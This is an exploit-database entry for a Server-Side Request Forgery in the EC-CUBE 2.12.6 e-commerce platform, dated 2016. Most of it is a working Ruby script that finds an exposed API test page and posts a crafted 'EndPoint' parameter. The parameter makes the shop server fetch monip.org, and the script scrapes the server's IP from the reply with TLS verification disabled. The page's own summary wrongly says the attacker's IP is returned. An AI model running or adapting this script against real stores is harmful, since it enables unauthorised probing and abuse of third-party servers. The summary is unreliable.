EC-CUBE 2.12.6 Server-Side Request Forgery

vendor:

EC-CUBE

by:

Wad Deek

8,8

CVSS

HIGH

Server-Side Request Forgery

918

CWE

Product Name: EC-CUBE

Affected Version From: 2.12.6en-p1

Affected Version To: 2.12.6en-p1

Patch Exists: YES

Related CWE: N/A

CPE: a:ec-cube:ec-cube:2.12.6en-p1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Xampp on Windows7

2016

EC-CUBE 2.12.6 Server-Side Request Forgery

This exploit is for EC-CUBE 2.12.6, a Japanese e-commerce platform. The vulnerability is a Server-Side Request Forgery (SSRF) vulnerability which allows an attacker to send a malicious request to a vulnerable server. The exploit uses a fuzzing tool to find the vulnerable endpoint and then sends a POST request with a malicious EndPoint parameter. The malicious request is then sent to the vulnerable server, which then returns the IP address of the attacker.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user-supplied input is properly validated and sanitized before being used in any requests.

Source

Exploit-DB raw data:

# Exploit Title: EC-CUBE 2.12.6 Server-Side Request Forgery
# Date: 22/10/16
# Exploit Author: Wad Deek
# Vendor Homepage: http://en.ec-cube.net/
# Software Link: http://en.ec-cube.net/download/
# Version: 2.12.6en-p1
# Tested on: Xampp on Windows7
# Fuzzing tool: https://github.com/Trouiller-David/PHP-Source-Code-Analysis-Tools
##
##
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
require('mechanize')
agent = Mechanize.new()
agent.read_timeout = 3
agent.open_timeout = 3
agent.keep_alive = false
agent.redirect_ok = true
agent.agent.http.verify_mode = OpenSSL::SSL::VERIFY_NONE
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#===========================
urls = <<URLS
http://localhost/eccube/
URLS
urls.split("\n").each() do |url|
#===========================
#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
def get(agent, target)
begin
response = agent.get(target)
code = response.code()
body = response.body()
rescue
else
return code, body
end
end
#{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{
#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
target = url+"test/api_test.php"
code, body = get(agent, target)
if(code == "200" && body.include?("EC-CUBE API TEST") == true)
begin
response = agent.post(
target,
{
"AccessKeyId" => 4111111111111111,
"arg_key0" => 1,
"arg_key1" => 1,
"arg_key2" => 1,
"arg_key3" => 1,
"arg_key4" => 1,
"arg_key5" => 1,
"arg_key6" => 1,
"arg_key7" => 1,
"arg_key8" => 1,
"arg_key9" => 1,
"arg_val0" => 1,
"arg_val1" => 1,
"arg_val2" => 1,
"arg_val3" => 1,
"arg_val4" => 1,
"arg_val5" => 1,
"arg_val6" => 1,
"arg_val7" => 1,
"arg_val8" => 1,
"arg_val9" => 1,
#????????????????????????????????????????????????????????????
"EndPoint" => "http://www.monip.org/index.php"+"?.jpg",
#????????????????????????????????????????????????????????????
"mode=" => "",
"Operation" => 1,
"SecretKey" => 1,
"Service" => 1,
"Signature" => 1,
"Timestamp" => 1,
"type" => "index.php"
})
body = response.body()
rescue
else
ip = response.body().scan(/IP : (.+?)</).join()
puts("[+] "+target+" >>>> monip.org >>>> "+ip)
end
end
#}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
#===========================
end
#===========================